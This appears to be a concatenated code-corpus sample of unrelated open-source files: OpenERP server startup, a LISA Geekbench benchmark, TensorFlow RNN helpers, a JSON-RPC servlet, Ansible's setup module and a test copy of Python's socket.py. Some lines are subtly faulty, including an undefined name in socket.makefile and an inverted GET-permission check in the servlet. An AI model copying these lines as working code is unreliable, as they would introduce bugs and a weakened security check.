# run test_file if provided
if test_file:
_logger.info('loading test file %s', test_file)
with openerp.api.Environment.manage():
if test_file.endswith('yml'):
load_test_file_yml(registry, test_file)
elif test_file.endswith('py'):
load_test_file_py(registry, test_file)
if registry._assertion_report.failures:
rc += 1
except Exception:
_logger.critical('Failed to initialize database `%s`.', dbname, exc_info=True)
return -1
return rc
def start(preload=None, stop=False):
""" Start the openerp http server and cron processor.
"""
global server
load_server_wide_modules()
if openerp.evented:
server = GeventServer(openerp.service.wsgi_server.application)
elif config['workers']:
server = PreforkServer(openerp.service.wsgi_server.application)
else:
server = ThreadedServer(openerp.service.wsgi_server.application)
if config['auto_reload']:
autoreload = AutoReload(server)
autoreload.run()
rc = server.run(preload, stop)
# like the legend of the phoenix, all ends with beginnings
if getattr(openerp, 'phoenix', False):
modules = []
if config['auto_reload']:
modules = autoreload.modules.keys()
_reexec(modules)
return rc if rc else 0
def restart():
""" Restart the server
"""
if os.name == 'nt':
# run in a thread to let the current thread return response to the caller.
threading.Thread(target=_reexec).start()
else:
os.kill(server.pid, signal.SIGHUP)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mdigiorgio/lisa | tests/benchmarks/android_geekbench.py | 4 | 3914 | #!/usr/bin/env python
import os
from time import sleep
# The workload class MUST be loaded before the LisaBenchmark
from android import Workload
from android import LisaBenchmark
from devlib.exception import TargetError
class GeekbenchTest(LisaBenchmark):
# Android Workload to run
bm_name = 'Geekbench'
# Default products to be collected
bm_collect = 'ftrace energy'
def benchmarkInit(self):
self.setupWorkload()
self.setupGovernor()
def __init__(self, governor, test):
self.governor = governor
self.test = test
super(GeekbenchTest, self).__init__()
def setupWorkload(self):
# Create a results folder for each "governor/test"
self.out_dir = os.path.join(self.te.res_dir, governor)
try:
os.stat(self.out_dir)
except:
os.makedirs(self.out_dir)
# Setup workload parameters
self.bm_params = {
'test_name' : self.test
}
def setupGovernor(self):
try:
self.target.cpufreq.set_all_governors(self.governor);
except TargetError:
self._log.warning('Governor [%s] not available on target',
self.governor)
raise
# Setup schedutil parameters
if self.governor == 'schedutil':
rate_limit_us = 2000
# Different schedutil versions have different tunables
tunables = self.target.cpufreq.list_governor_tunables(0)
if 'rate_limit_us' in tunables:
tunables = {'rate_limit_us' : str(rate_limit_us)}
else:
assert ('up_rate_limit_us' in tunables and
'down_rate_limit_us' in tunables)
tunables = {
'up_rate_limit_us' : str(rate_limit_us),
'down_rate_limit_us' : str(rate_limit_us)
}
try:
for cpu_id in range(self.te.platform['cpus_count']):
self.target.cpufreq.set_governor_tunables(
cpu_id, 'schedutil', **tunables)
except TargetError as e:
self._log.warning('Failed to set schedutils parameters: {}'\
.format(e))
raise
self._log.info('Set schedutil.rate_limit_us=%d', rate_limit_us)
# Setup ondemand parameters
if self.governor == 'ondemand':
try:
for cpu_id in range(self.te.platform['cpus_count']):
tunables = self.target.cpufreq.get_governor_tunables(cpu_id)
self.target.cpufreq.set_governor_tunables(
cpu_id, 'ondemand',
**{'sampling_rate' : tunables['sampling_rate_min']})
except TargetError as e:
self._log.warning('Failed to set ondemand parameters: {}'\
.format(e))
raise
self._log.info('Set ondemand.sampling_rate to minimum supported')
# Report configured governor
governors = self.target.cpufreq.get_all_governors()
self._log.info('Using governors: %s', governors)
# Run the benchmark in each of the supported governors
governors = [
'performance',
'ondemand',
'interactive',
'sched',
'schedutil',
'powersave',
]
tests = [
'CPU',
'COMPUTE'
]
tests_remaining = len(governors) * len(tests)
tests_completed = 0
for governor in governors:
for test in tests:
tests_remaining -= 1
try:
GeekbenchTest(governor, test)
tests_completed += 1
except:
# A test configuraion failed, continue with other tests
pass
# We want to collect data from at least one governor
assert(tests_completed >= 1)
# vim :set tabstop=4 shiftwidth=4 expandtab
| apache-2.0 |
ikaee/bfr-attendant | facerecognitionlibrary/jni-build/jni/include/tensorflow/contrib/rnn/python/ops/rnn.py | 25 | 10321 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""RNN helpers for TensorFlow models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.rnn.python.ops import core_rnn as contrib_rnn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import variable_scope as vs
def stack_bidirectional_rnn(cells_fw,
cells_bw,
inputs,
initial_states_fw=None,
initial_states_bw=None,
dtype=None,
sequence_length=None,
scope=None):
"""Creates a bidirectional recurrent neural network.
Stacks several bidirectional rnn layers. The combined forward and backward
layer outputs are used as input of the next layer. tf.bidirectional_rnn
does not allow to share forward and backward information between layers.
The input_size of the first forward and backward cells must match.
The initial state for both directions is zero and no intermediate states
are returned.
As described in https://arxiv.org/abs/1303.5778
Args:
cells_fw: List of instances of RNNCell, one per layer,
to be used for forward direction.
cells_bw: List of instances of RNNCell, one per layer,
to be used for backward direction.
inputs: A length T list of inputs, each a tensor of shape
[batch_size, input_size], or a nested tuple of such elements.
initial_states_fw: (optional) A list of the initial states (one per layer)
for the forward RNN.
Each tensor must has an appropriate type and shape
`[batch_size, cell_fw.state_size]`.
initial_states_bw: (optional) Same as for `initial_states_fw`, but using
the corresponding properties of `cells_bw`.
dtype: (optional) The data type for the initial state. Required if
either of the initial states are not provided.
sequence_length: (optional) An int32/int64 vector, size `[batch_size]`,
containing the actual lengths for each of the sequences.
scope: VariableScope for the created subgraph; defaults to None.
Returns:
A tuple (outputs, output_state_fw, output_state_bw) where:
outputs is a length `T` list of outputs (one for each input), which
are depth-concatenated forward and backward outputs.
output_states_fw is the final states, one tensor per layer,
of the forward rnn.
output_states_bw is the final states, one tensor per layer,
of the backward rnn.
Raises:
TypeError: If `cell_fw` or `cell_bw` is not an instance of `RNNCell`.
ValueError: If inputs is None, not a list or an empty list.
"""
if not cells_fw:
raise ValueError("Must specify at least one fw cell for BidirectionalRNN.")
if not cells_bw:
raise ValueError("Must specify at least one bw cell for BidirectionalRNN.")
if not isinstance(cells_fw, list):
raise ValueError("cells_fw must be a list of RNNCells (one per layer).")
if not isinstance(cells_bw, list):
raise ValueError("cells_bw must be a list of RNNCells (one per layer).")
if len(cells_fw) != len(cells_bw):
raise ValueError("Forward and Backward cells must have the same depth.")
if initial_states_fw is not None and (not isinstance(cells_fw, list) or
len(cells_fw) != len(cells_fw)):
raise ValueError(
"initial_states_fw must be a list of state tensors (one per layer).")
if initial_states_bw is not None and (not isinstance(cells_bw, list) or
len(cells_bw) != len(cells_bw)):
raise ValueError(
"initial_states_bw must be a list of state tensors (one per layer).")
states_fw = []
states_bw = []
prev_layer = inputs
with vs.variable_scope(scope or "stack_bidirectional_rnn"):
for i, (cell_fw, cell_bw) in enumerate(zip(cells_fw, cells_bw)):
initial_state_fw = None
initial_state_bw = None
if initial_states_fw:
initial_state_fw = initial_states_fw[i]
if initial_states_bw:
initial_state_bw = initial_states_bw[i]
with vs.variable_scope("cell_%d" % i) as cell_scope:
prev_layer, state_fw, state_bw = contrib_rnn.static_bidirectional_rnn(
cell_fw,
cell_bw,
prev_layer,
initial_state_fw=initial_state_fw,
initial_state_bw=initial_state_bw,
sequence_length=sequence_length,
dtype=dtype,
scope=cell_scope)
states_fw.append(state_fw)
states_bw.append(state_bw)
return prev_layer, tuple(states_fw), tuple(states_bw)
def stack_bidirectional_dynamic_rnn(cells_fw,
cells_bw,
inputs,
initial_states_fw=None,
initial_states_bw=None,
dtype=None,
sequence_length=None,
parallel_iterations=None,
scope=None):
"""Creates a dynamic bidirectional recurrent neural network.
Stacks several bidirectional rnn layers. The combined forward and backward
layer outputs are used as input of the next layer. tf.bidirectional_rnn
does not allow to share forward and backward information between layers.
The input_size of the first forward and backward cells must match.
The initial state for both directions is zero and no intermediate states
are returned.
Args:
cells_fw: List of instances of RNNCell, one per layer,
to be used for forward direction.
cells_bw: List of instances of RNNCell, one per layer,
to be used for backward direction.
inputs: The RNN inputs. this must be a tensor of shape:
`[batch_size, max_time, ...]`, or a nested tuple of such elements.
initial_states_fw: (optional) A list of the initial states (one per layer)
for the forward RNN.
Each tensor must has an appropriate type and shape
`[batch_size, cell_fw.state_size]`.
initial_states_bw: (optional) Same as for `initial_states_fw`, but using
the corresponding properties of `cells_bw`.
dtype: (optional) The data type for the initial state. Required if
either of the initial states are not provided.
sequence_length: (optional) An int32/int64 vector, size `[batch_size]`,
containing the actual lengths for each of the sequences.
parallel_iterations: (Default: 32). The number of iterations to run in
parallel. Those operations which do not have any temporal dependency
and can be run in parallel, will be. This parameter trades off
time for space. Values >> 1 use more memory but take less time,
while smaller values use less memory but computations take longer.
scope: VariableScope for the created subgraph; defaults to None.
Returns:
A tuple (outputs, output_state_fw, output_state_bw) where:
outputs: Output `Tensor` shaped:
`batch_size, max_time, layers_output]`. Where layers_output
are depth-concatenated forward and backward outputs.
output_states_fw is the final states, one tensor per layer,
of the forward rnn.
output_states_bw is the final states, one tensor per layer,
of the backward rnn.
Raises:
TypeError: If `cell_fw` or `cell_bw` is not an instance of `RNNCell`.
ValueError: If inputs is `None`.
"""
if not cells_fw:
raise ValueError("Must specify at least one fw cell for BidirectionalRNN.")
if not cells_bw:
raise ValueError("Must specify at least one bw cell for BidirectionalRNN.")
if not isinstance(cells_fw, list):
raise ValueError("cells_fw must be a list of RNNCells (one per layer).")
if not isinstance(cells_bw, list):
raise ValueError("cells_bw must be a list of RNNCells (one per layer).")
if len(cells_fw) != len(cells_bw):
raise ValueError("Forward and Backward cells must have the same depth.")
if initial_states_fw is not None and (not isinstance(cells_fw, list) or
len(cells_fw) != len(cells_fw)):
raise ValueError(
"initial_states_fw must be a list of state tensors (one per layer).")
if initial_states_bw is not None and (not isinstance(cells_bw, list) or
len(cells_bw) != len(cells_bw)):
raise ValueError(
"initial_states_bw must be a list of state tensors (one per layer).")
states_fw = []
states_bw = []
prev_layer = inputs
with vs.variable_scope(scope or "stack_bidirectional_rnn"):
for i, (cell_fw, cell_bw) in enumerate(zip(cells_fw, cells_bw)):
initial_state_fw = None
initial_state_bw = None
if initial_states_fw:
initial_state_fw = initial_states_fw[i]
if initial_states_bw:
initial_state_bw = initial_states_bw[i]
with vs.variable_scope("cell_%d" % i):
outputs, (state_fw, state_bw) = rnn.bidirectional_dynamic_rnn(
cell_fw,
cell_bw,
prev_layer,
initial_state_fw=initial_state_fw,
initial_state_bw=initial_state_bw,
sequence_length=sequence_length,
parallel_iterations=parallel_iterations,
dtype=dtype)
# Concat the outputs to create the new input.
prev_layer = array_ops.concat(outputs, 2)
states_fw.append(state_fw)
states_bw.append(state_bw)
return prev_layer, tuple(states_fw), tuple(states_bw)
| apache-2.0 |
onoga/toolib | toolib/web/kit/JSONRPCServlet.py | 2 | 4091 | """JSON-RPC servlet base class
Written by Jean-Francois Pieronne
"""
DEBUG = 0
import traceback
from MiscUtils import StringIO
try:
import simplejson
except ImportError:
print "ERROR: simplejson is not installed."
print "Get it from http://cheeseshop.python.org/pypi/simplejson"
from WebKit.HTTPContent import HTTPContent
class JSONRPCServlet(HTTPContent):
"""A superclass for Webware servlets using JSON-RPC techniques.
JSONRPCServlet can be used to make coding JSON-RPC applications easier.
Subclasses should override the method exposedMethods() which returns a list
of method names. These method names refer to Webware Servlet methods that
are able to be called by an JSON-RPC-enabled web page. This is very similar
in functionality to Webware's actions.
Some basic security measures against JavaScript hijacking are taken by
default which can be deactivated if you're not dealing with sensitive data.
You can further increase security by adding shared secret mechanisms.
"""
# Class level variables that can be overridden by servlet instances:
_debug = 0 # set to True if you want to see debugging output
# The following variables control security precautions concerning
# a vulnerability known as "JavaScript hijacking". See also:
# http://www.fortifysoftware.com/servlet/downloads/public/JavaScript_Hijacking.pdf
# http://ajaxian.com/archives/protecting-a-javascript-service
_allowGet = 0 # set to True if you want to allow GET requests
_allowEval = 0 # set to True to allow direct evaluation of the response
_encoding = 'utf-8' # set input str encoding
def __init__(self):
HTTPContent.__init__(self)
def respondToGet(self, transaction):
if self._allowGet:
self.writeError("GET method not allowed")
HTTPContent.respondToGet(self, transaction)
def defaultAction(self):
self.jsonCall()
def actions(self):
actions = HTTPContent.actions(self)
actions.append('jsonCall')
return actions
def exposedMethods(self):
return []
def writeError(self, msg):
self.write(simplejson.dumps({'id': self._id, 'code': -1, 'error': msg}, encoding=self._encoding))
def writeResult(self, data):
if DEBUG:
self._check(data)
data = simplejson.dumps({'id': self._id, 'result': data}, encoding=self._encoding)
if not self._allowEval:
data = 'throw new Error' \
'("Direct evaluation not allowed");\n/*%s*/' % (data,)
self.write(data)
def jsonCall(self):
"""Execute method with arguments on the server side.
Returns Javascript function to be executed by the client immediately.
"""
request = self.request()
data = simplejson.loads(request.rawInput().read(), encoding=self._encoding)
self._id, call, params = data["id"], data["method"], data["params"]
if call == 'system.listMethods':
self.writeResult(self.exposedMethods())
elif call in self.exposedMethods():
try:
method = getattr(self, call)
except AttributeError:
self.writeError('%s, although an approved method, '
'was not found' % call)
else:
try:
if self._debug:
self.log("json call %s(%s)" % (call, params))
self.writeResult(method(*params))
except Exception:
err = StringIO()
traceback.print_exc(file=err)
e = err.getvalue()
self.writeError('%s was called, '
'but encountered an error: %s' % (call, e))
err.close()
else:
self.writeError('%s is not an approved method' % call)
def _check(self, o):
if o is None:
pass
elif isinstance(o, dict):
self._check_dict(o)
elif isinstance(o, (list, tuple)):
self._check_list(o)
elif isinstance(o, str):
try:
unicode(o)
except:
raise RuntimeError, u"str value %s cannot be coerced to unicode" % repr(o)
elif isinstance(o, (int, long, float, unicode)):
pass
else:
raise RuntimeError, 'Unknown type: %s (value: %s)' % (type(o), repr(o))
def _check_dict(self, d):
print ">>> check dict"
for k, v in d.iteritems():
print '>>>', k, repr(v)
self._check(k)
self._check(v)
def _check_list(self, l):
print ">>> check list"
for v in l:
print '>>>', v
self._check(v)
| gpl-2.0 |
puzan/ansible | lib/ansible/modules/system/setup.py | 16 | 5737 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
---
module: setup
version_added: historical
short_description: Gathers facts about remote hosts
options:
gather_subset:
version_added: "2.1"
description:
- "if supplied, restrict the additional facts collected to the given subset.
Possible values: all, hardware, network, virtual, ohai, and
facter Can specify a list of values to specify a larger subset.
Values can also be used with an initial C(!) to specify that
that specific subset should not be collected. For instance:
!hardware, !network, !virtual, !ohai, !facter. Note that a few
facts are always collected. Use the filter parameter if you do
not want to display those."
required: false
default: 'all'
gather_timeout:
version_added: "2.2"
description:
- "Set the default timeout in seconds for individual fact gathering"
required: false
default: 10
filter:
version_added: "1.1"
description:
- if supplied, only return facts that match this shell-style (fnmatch) wildcard.
required: false
default: '*'
fact_path:
version_added: "1.3"
description:
- path used for local ansible facts (*.fact) - files in this dir
will be run (if executable) and their results be added to ansible_local facts
if a file is not executable it is read. Check notes for Windows options. (from 2.1 on)
File/results format can be json or ini-format
required: false
default: '/etc/ansible/facts.d'
description:
- This module is automatically called by playbooks to gather useful
variables about remote hosts that can be used in playbooks. It can also be
executed directly by C(/usr/bin/ansible) to check what variables are
available to a host. Ansible provides many I(facts) about the system,
automatically.
notes:
- More ansible facts will be added with successive releases. If I(facter) or
I(ohai) are installed, variables from these programs will also be snapshotted
into the JSON file for usage in templating. These variables are prefixed
with C(facter_) and C(ohai_) so it's easy to tell their source. All variables are
bubbled up to the caller. Using the ansible facts and choosing to not
install I(facter) and I(ohai) means you can avoid Ruby-dependencies on your
remote systems. (See also M(facter) and M(ohai).)
- The filter option filters only the first level subkey below ansible_facts.
- If the target host is Windows, you will not currently have the ability to use
C(filter) as this is provided by a simpler implementation of the module.
- If the target host is Windows you can now use C(fact_path). Make sure that this path
exists on the target host. Files in this path MUST be PowerShell scripts (``*.ps1``) and
their output must be formattable in JSON (Ansible will take care of this). Test the
output of your scripts.
This option was added in Ansible 2.1.
author:
- "Ansible Core Team"
- "Michael DeHaan"
- "David O'Brien @david_obrien davidobrien1985"
'''
EXAMPLES = """
# Display facts from all hosts and store them indexed by I(hostname) at C(/tmp/facts).
# ansible all -m setup --tree /tmp/facts
# Display only facts regarding memory found by ansible on all hosts and output them.
# ansible all -m setup -a 'filter=ansible_*_mb'
# Display only facts returned by facter.
# ansible all -m setup -a 'filter=facter_*'
# Display only facts about certain interfaces.
# ansible all -m setup -a 'filter=ansible_eth[0-2]'
# Restrict additional gathered facts to network and virtual.
# ansible all -m setup -a 'gather_subset=network,virtual'
# Do not call puppet facter or ohai even if present.
# ansible all -m setup -a 'gather_subset=!facter,!ohai'
# Only collect the minimum amount of facts:
# ansible all -m setup -a 'gather_subset=!all'
# Display facts from Windows hosts with custom facts stored in C(C:\\custom_facts).
# ansible windows -m setup -a "fact_path='c:\\custom_facts'"
"""
def main():
module = AnsibleModule(
argument_spec = dict(
gather_subset=dict(default=["all"], required=False, type='list'),
gather_timeout=dict(default=10, required=False, type='int'),
filter=dict(default="*", required=False),
fact_path=dict(default='/etc/ansible/facts.d', required=False, type='path'),
),
supports_check_mode = True,
)
data = get_all_facts(module)
module.exit_json(**data)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.facts import *
if __name__ == '__main__':
main()
| gpl-3.0 |
methoxid/micropystat | tests/bytecode/pylib-tests/socket.py | 22 | 14915 | # Wrapper module for _socket, providing some additional facilities
# implemented in Python.
"""\
This module provides socket operations and some related functions.
On Unix, it supports IP (Internet Protocol) and Unix domain sockets.
On other systems, it only supports IP. Functions specific for a
socket are available as methods of the socket object.
Functions:
socket() -- create a new socket object
socketpair() -- create a pair of new socket objects [*]
fromfd() -- create a socket object from an open file descriptor [*]
fromshare() -- create a socket object from data received from socket.share() [*]
gethostname() -- return the current hostname
gethostbyname() -- map a hostname to its IP number
gethostbyaddr() -- map an IP number or hostname to DNS info
getservbyname() -- map a service name and a protocol name to a port number
getprotobyname() -- map a protocol name (e.g. 'tcp') to a number
ntohs(), ntohl() -- convert 16, 32 bit int from network to host byte order
htons(), htonl() -- convert 16, 32 bit int from host to network byte order
inet_aton() -- convert IP addr string (123.45.67.89) to 32-bit packed format
inet_ntoa() -- convert 32-bit packed format IP to string (123.45.67.89)
socket.getdefaulttimeout() -- get the default timeout value
socket.setdefaulttimeout() -- set the default timeout value
create_connection() -- connects to an address, with an optional timeout and
optional source address.
[*] not available on all platforms!
Special objects:
SocketType -- type object for socket objects
error -- exception raised for I/O errors
has_ipv6 -- boolean value indicating if IPv6 is supported
Integer constants:
AF_INET, AF_UNIX -- socket domains (first argument to socket() call)
SOCK_STREAM, SOCK_DGRAM, SOCK_RAW -- socket types (second argument)
Many other constants may be defined; these may be used in calls to
the setsockopt() and getsockopt() methods.
"""
import _socket
from _socket import *
import os, sys, io
try:
import errno
except ImportError:
errno = None
EBADF = getattr(errno, 'EBADF', 9)
EAGAIN = getattr(errno, 'EAGAIN', 11)
EWOULDBLOCK = getattr(errno, 'EWOULDBLOCK', 11)
__all__ = ["getfqdn", "create_connection"]
__all__.extend(os._get_exports_list(_socket))
_realsocket = socket
# WSA error codes
if sys.platform.lower().startswith("win"):
errorTab = {}
errorTab[10004] = "The operation was interrupted."
errorTab[10009] = "A bad file handle was passed."
errorTab[10013] = "Permission denied."
errorTab[10014] = "A fault occurred on the network??" # WSAEFAULT
errorTab[10022] = "An invalid operation was attempted."
errorTab[10035] = "The socket operation would block"
errorTab[10036] = "A blocking operation is already in progress."
errorTab[10048] = "The network address is in use."
errorTab[10054] = "The connection has been reset."
errorTab[10058] = "The network has been shut down."
errorTab[10060] = "The operation timed out."
errorTab[10061] = "Connection refused."
errorTab[10063] = "The name is too long."
errorTab[10064] = "The host is down."
errorTab[10065] = "The host is unreachable."
__all__.append("errorTab")
class socket(_socket.socket):
"""A subclass of _socket.socket adding the makefile() method."""
__slots__ = ["__weakref__", "_io_refs", "_closed"]
def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, fileno=None):
_socket.socket.__init__(self, family, type, proto, fileno)
self._io_refs = 0
self._closed = False
def __enter__(self):
return self
def __exit__(self, *args):
if not self._closed:
self.close()
def __repr__(self):
"""Wrap __repr__() to reveal the real class name."""
s = _socket.socket.__repr__(self)
if s.startswith("<socket object"):
s = "<%s.%s%s%s" % (self.__class__.__module__,
self.__class__.__name__,
getattr(self, '_closed', False) and " [closed] " or "",
s[7:])
return s
def __getstate__(self):
raise TypeError("Cannot serialize socket object")
def dup(self):
"""dup() -> socket object
Return a new socket object connected to the same system resource.
"""
fd = dup(self.fileno())
sock = self.__class__(self.family, self.type, self.proto, fileno=fd)
sock.settimeout(self.gettimeout())
return sock
def accept(self):
"""accept() -> (socket object, address info)
Wait for an incoming connection. Return a new socket
representing the connection, and the address of the client.
For IP sockets, the address info is a pair (hostaddr, port).
"""
fd, addr = self._accept()
sock = socket(self.family, self.type, self.proto, fileno=fd)
# Issue #7995: if no default timeout is set and the listening
# socket had a (non-zero) timeout, force the new socket in blocking
# mode to override platform-specific socket flags inheritance.
if getdefaulttimeout() is None and self.gettimeout():
sock.setblocking(True)
return sock, addr
def makefile(self, mode="r", buffering=None, *,
encoding=None, errors=None, newline=None):
"""makefile(...) -> an I/O stream connected to the socket
The arguments are as for io.open() after the filename,
except the only mode characters supported are 'r', 'w' and 'b'.
The semantics are similar too. (XXX refactor to share code?)
"""
for c in mode:
if c not in {a+"r", "w", "b"}:
raise ValueError("invalid mode %r (only r, w, b allowed)")
writing = "w" in mode
reading = "r" in mode or not writing
assert reading or writing
binary = "b" in mode
rawmode = ""
if reading:
rawmode += "r"
if writing:
rawmode += "w"
raw = SocketIO(self, rawmode)
self._io_refs += 1
if buffering is None:
buffering = -1
if buffering < 0:
buffering = io.DEFAULT_BUFFER_SIZE
if buffering == 0:
if not binary:
raise ValueError("unbuffered streams must be binary")
return raw
if reading and writing:
buffer = io.BufferedRWPair(raw, raw, buffering)
elif reading:
buffer = io.BufferedReader(raw, buffering)
else:
assert writing
buffer = io.BufferedWriter(raw, buffering)
if binary:
return buffer
text = io.TextIOWrapper(buffer, encoding, errors, newline)
text.mode = mode
return text
def _decref_socketios(self):
if self._io_refs > 0:
self._io_refs -= 1
if self._closed:
self.close()
def _real_close(self, _ss=_socket.socket):
# This function should not reference any globals. See issue #808164.
_ss.close(self)
def close(self):
# This function should not reference any globals. See issue #808164.
self._closed = True
if self._io_refs <= 0:
self._real_close()
def detach(self):
"""detach() -> file descriptor
Close the socket object without closing the underlying file descriptor.
The object cannot be used after this call, but the file descriptor
can be reused for other purposes. The file descriptor is returned.
"""
self._closed = True
return super().detach()
def fromfd(fd, family, type, proto=0):
""" fromfd(fd, family, type[, proto]) -> socket object
Create a socket object from a duplicate of the given file
descriptor. The remaining arguments are the same as for socket().
"""
nfd = dup(fd)
return socket(family, type, proto, nfd)
if hasattr(_socket.socket, "share"):
def fromshare(info):
""" fromshare(info) -> socket object
Create a socket object from a the bytes object returned by
socket.share(pid).
"""
return socket(0, 0, 0, info)
if hasattr(_socket, "socketpair"):
def socketpair(family=None, type=SOCK_STREAM, proto=0):
"""socketpair([family[, type[, proto]]]) -> (socket object, socket object)
Create a pair of socket objects from the sockets returned by the platform
socketpair() function.
The arguments are the same as for socket() except the default family is
AF_UNIX if defined on the platform; otherwise, the default is AF_INET.
"""
if family is None:
try:
family = AF_UNIX
except NameError:
family = AF_INET
a, b = _socket.socketpair(family, type, proto)
a = socket(family, type, proto, a.detach())
b = socket(family, type, proto, b.detach())
return a, b
_blocking_errnos = { EAGAIN, EWOULDBLOCK }
class SocketIO(io.RawIOBase):
"""Raw I/O implementation for stream sockets.
This class supports the makefile() method on sockets. It provides
the raw I/O interface on top of a socket object.
"""
# One might wonder why not let FileIO do the job instead. There are two
# main reasons why FileIO is not adapted:
# - it wouldn't work under Windows (where you can't used read() and
# write() on a socket handle)
# - it wouldn't work with socket timeouts (FileIO would ignore the
# timeout and consider the socket non-blocking)
# XXX More docs
def __init__(self, sock, mode):
if mode not in ("r", "w", "rw", "rb", "wb", "rwb"):
raise ValueError("invalid mode: %r" % mode)
io.RawIOBase.__init__(self)
self._sock = sock
if "b" not in mode:
mode += "b"
self._mode = mode
self._reading = "r" in mode
self._writing = "w" in mode
self._timeout_occurred = False
def readinto(self, b):
"""Read up to len(b) bytes into the writable buffer *b* and return
the number of bytes read. If the socket is non-blocking and no bytes
are available, None is returned.
If *b* is non-empty, a 0 return value indicates that the connection
was shutdown at the other end.
"""
self._checkClosed()
self._checkReadable()
if self._timeout_occurred:
raise IOError("cannot read from timed out object")
while True:
try:
return self._sock.recv_into(b)
except timeout:
self._timeout_occurred = True
raise
except InterruptedError:
continue
except error as e:
if e.args[0] in _blocking_errnos:
return None
raise
def write(self, b):
"""Write the given bytes or bytearray object *b* to the socket
and return the number of bytes written. This can be less than
len(b) if not all data could be written. If the socket is
non-blocking and no bytes could be written None is returned.
"""
self._checkClosed()
self._checkWritable()
try:
return self._sock.send(b)
except error as e:
# XXX what about EINTR?
if e.args[0] in _blocking_errnos:
return None
raise
def readable(self):
"""True if the SocketIO is open for reading.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return self._reading
def writable(self):
"""True if the SocketIO is open for writing.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return self._writing
def seekable(self):
"""True if the SocketIO is open for seeking.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return super().seekable()
def fileno(self):
"""Return the file descriptor of the underlying socket.
"""
self._checkClosed()
return self._sock.fileno()
@property
def name(self):
if not self.closed:
return self.fileno()
else:
return -1
@property
def mode(self):
return self._mode
def close(self):
"""Close the SocketIO object. This doesn't close the underlying
socket, except if all references to it have disappeared.
"""
if self.closed:
return
io.RawIOBase.close(self)
self._sock._decref_socketios()
self._sock = None
def getfqdn(name=''):
"""Get fully qualified domain name from name.
An empty argument is interpreted as meaning the local host.
First the hostname returned by gethostbyaddr() is checked, then
possibly existing aliases. In case no FQDN is available, hostname
from gethostname() is returned.
"""
name = name.strip()
if not name or name == '0.0.0.0':
name = gethostname()
try:
hostname, aliases, ipaddrs = gethostbyaddr(name)
except error:
pass
else:
aliases.insert(0, hostname)
for name in aliases:
if '.' in name:
break
else:
name = hostname
return name
_GLOBAL_DEFAULT_TIMEOUT = object()
def create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
An host of '' or port 0 tells the OS to use the default.
"""
host, port = address
err = None
for res in getaddrinfo(host, port, 0, SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket(af, socktype, proto)
if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise error("getaddrinfo returns an empty list")
| mit |
ilo10/scikit-learn | examples/plot_johnson_lindenstrauss_bound.py | 134 | 7452 | """
=====================================================================
The Johnson-Lindenstrauss bound for embedding with random projections
=====================================================================
The `Johnson-Lindenstrauss lemma`_ states that any high dimensional
dataset can be randomly projected into a lower dimensional Euclidean
space while controlling the distortion in the pairwise distances.
.. _`Johnson-Lindenstrauss lemma`: http://en.wikipedia.org/wiki/Johnson%E2%80%93Lindenstrauss_lemma
Theoretical bounds
==================
The distortion introduced by a random projection `p` is asserted by
the fact that `p` is defining an eps-embedding with good probability
as defined by:
(1 - eps) ||u - v||^2 < ||p(u) - p(v)||^2 < (1 + eps) ||u - v||^2
Where u and v are any rows taken from a dataset of shape [n_samples,
n_features] and p is a projection by a random Gaussian N(0, 1) matrix
with shape [n_components, n_features] (or a sparse Achlioptas matrix).
The minimum number of components to guarantees the eps-embedding is
given by:
n_components >= 4 log(n_samples) / (eps^2 / 2 - eps^3 / 3)
The first plot shows that with an increasing number of samples ``n_samples``,
the minimal number of dimensions ``n_components`` increased logarithmically
in order to guarantee an ``eps``-embedding.
The second plot shows that an increase of the admissible
distortion ``eps`` allows to reduce drastically the minimal number of
dimensions ``n_components`` for a given number of samples ``n_samples``
Empirical validation
====================
We validate the above bounds on the the digits dataset or on the 20 newsgroups
text document (TF-IDF word frequencies) dataset:
- for the digits dataset, some 8x8 gray level pixels data for 500
handwritten digits pictures are randomly projected to spaces for various
larger number of dimensions ``n_components``.
- for the 20 newsgroups dataset some 500 documents with 100k
features in total are projected using a sparse random matrix to smaller
euclidean spaces with various values for the target number of dimensions
``n_components``.
The default dataset is the digits dataset. To run the example on the twenty
